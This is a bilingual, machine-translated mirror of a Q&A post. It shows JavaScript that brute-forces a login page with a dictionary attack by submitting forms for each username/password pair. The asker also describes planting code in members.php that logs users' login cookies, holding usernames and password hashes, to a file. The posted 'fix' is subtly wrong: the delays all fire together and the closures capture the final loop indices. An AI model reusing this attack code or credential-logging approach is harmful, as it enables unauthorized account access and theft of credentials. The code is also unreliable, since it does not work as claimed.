[英]Checking if the attempt was successful during a Dictionary Attack
I am doing a project where in I have to carry out a Dictionary Attack. 我正在做一个项目,其中我必须进行字典攻击。 I am running a script that posts to the page that the login page would post to(say members.php).
我正在运行一个脚本,该脚本发布到登录页面将发布到的页面(例如members.php)。 Only thing that happens in the server side after a correct username and passwords is entered is that a cookies are set.
输入正确的用户名和密码后,只有在服务器端发生的事情是设置了cookie。 The Cookies have the values of username and password's sha value.
Cookies具有用户名和密码的sha值。 (Yes, I have the access to the source code).
(是的,我可以访问源代码)。
I have hard coded a script in members.php such that would retrieve the value of cookies every time some one logs in and stores it in a text file in my server. 我已经在members.php中对脚本进行了硬编码,这样每次有人登录时都会检索cookie的值,并将其存储在服务器中的文本文件中。 Hence I would be able to keep track of who ever has successfully logged in .
因此,我将能够跟踪谁成功登录了。
I am trying the following script to post to members.php to try and see if the logic works: 我正在尝试将以下脚本发布到members.php,以尝试查看逻辑是否有效:
function dictionary_run(username,password) {
var theForm, newInput7, newInput8, newInput9;
var i=0,j=0;
var bla3 = "Login";
theForm = document.createElement("form");
theForm.action = "URL/members.php";
theForm.method = "post";
newInput9 = document.createElement("input");
newInput9.type = "text";
newInput9.name = "username";
newInput9.value = username;
newInput8 = document.createElement("input");
newInput8.type = "password";
newInput8.name = "password";
newInput8.value = password;
newInput7 = document.createElement("input");
newInput7.type = "submit";
newInput7.name = "submit";
newInput7.value = bla3;
theForm.appendChild(newInput9);
theForm.appendChild(newInput8);
theForm.appendChild(newInput7);
newInput7.click();
}
function main() {
var user_name = ["jasmine", "fd", "jasmhghine","dfdf"];
var pass_word = ["jasmine", "jasminhge", "dffd","dfdfdf"];
var i,j;
for(i=0; i<4 ;i++) {
for(j=0; j<4;j++) {
dictionary_run(user_name[i],pass_word[j]);
}
}
}
main();
Apparently it doesn't work. 显然它不起作用。 I know that jasmine as password and username is correct(user_name[0] and pass_word[0] here).
我知道茉莉花作为密码和用户名是正确的(此处为user_name [0]和pass_word [0])。 Even then,my script hard coded in members.php doesn't capture the successful login attempt.
即使这样,我的硬编码在members.php中的脚本也无法捕获成功的登录尝试。
I have also tried to break it with 我也试图用
if(document.cookie) break;
after each submission. 每次提交后。 This also doesn't work.
这也不起作用。 I can not think of another way to check if the login attempt was successful or not.
我想不出另一种方法来检查登录尝试是否成功。
Any help would be greatly appreciated. 任何帮助将不胜感激。 Thanks!
谢谢!
Alright, I found the problem, just because I was posting in very quick successions, only the last input was being checked. 好的,我发现了问题,只是因为我要快速连续发布,所以只检查了最后一个输入。 So I just used a delay of a few seconds and it worked.
所以我只用了几秒钟的延迟就可以了。
for(i=0; i<4;i++) {
for(j=0; j<4;j++) {
var delay=5000;//1 seconds
setTimeout(function(){
dictionary_run(user_name[i],pass_word[j]);
},delay);
}
}
Thanks ! 谢谢 !
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.